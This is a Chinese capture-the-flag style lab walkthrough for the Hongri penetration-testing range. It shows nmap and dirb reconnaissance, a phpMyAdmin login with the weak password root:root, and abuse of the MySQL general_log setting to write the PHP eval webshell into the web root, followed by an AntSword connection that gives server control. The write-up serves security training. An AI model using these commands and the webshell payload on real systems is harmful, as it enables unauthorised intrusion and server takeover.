【渗透测试】-红日靶场-获取web服务器权限

拓扑图:

前置环境配置:

Win 7

默认密码:hongrisec@201

内网ip:192.168.52.143

打开虚拟网络编辑器

添加网络->VMent1->仅主机模式->子网ip:192.168.145.0

添加网卡:

虚拟机->设置-> 添加->网络适配器

保存,打开win 7并重启:

查看ip地址:

外网ip: Ip:192.168.145.129

内网ip: Ip:192.168.52.143

进入C:\phpstudy,启动

渗透测试:

方法一:phpadmin

打开kali,ip:192.168.145.128

存活主机探测

命令:nmap -sn 192.168.145.0/24

全端口扫描

命令:nmap -A -p 1-65535 192.168.145.129

80端口-> 开放 http服务

3306端口->开放 mysql服务

目录扫描

命令:dirb http://192.168.145.129

http://192.168.145.129/phpmyadmin/

登录验证:

192.168.145.129:80

泄露:

路径:C:/phpStudy/WWW

使用弱口令进行数据库连接:

root:root

http://192.168.145.129/phpmyadmin/

登录->sql。

第一步 查询日志 命令: show variables like '%general%';

发现日志写入系统关闭,需要打开。

命令: set global general_log='on';

开启成功。

在C:/phpStudy/WWW/2.php路径下写入一句话木马:

set global general_log_file = 'C:/phpStudy/WWW/2.php'

select '<?php @eval($_POST["cmd"]);?>'

验证:http://192.168.145.129/2.php

使用中国蚁剑连接成功。

拿到服务器主机权限。

相关推荐
梦在深巷@14 分钟前
sqli-libs通关教程(21-30)
数据库·网络安全
三不原则23 分钟前
日志管理工具 ——ELK Stack
运维·elk
qinyia26 分钟前
云原生运维与混合云运维:如何选择及 Wisdom SSH 的应用
运维·云原生·ssh
卓码软件测评34 分钟前
【基于WAF的Web安全测试:绕过Cloudflare/Aliyun防护策略】
安全·web安全
高hongyuan43 分钟前
网络故障排查及解决方案
网络·dns
字节高级特工1 小时前
线程互斥锁:守护临界区的关键
linux·运维·服务器·c语言
千码君20161 小时前
计算机网络:理解路由的下一跳
网络·计算机网络·智能路由器·路由表·网关地址·接口地址·相邻设备
AORO20252 小时前
三防平板电脑是什么?这款三防平板支持红外测温!
5g·安全·智能手机·电脑·harmonyos
木子欢儿2 小时前
在 Debian 12 上安装 Xfce 桌面
java·linux·运维·服务器·debian
Vdeilae2 小时前
debian 时间同步 设置ntp服务端 客户端
java·服务器·debian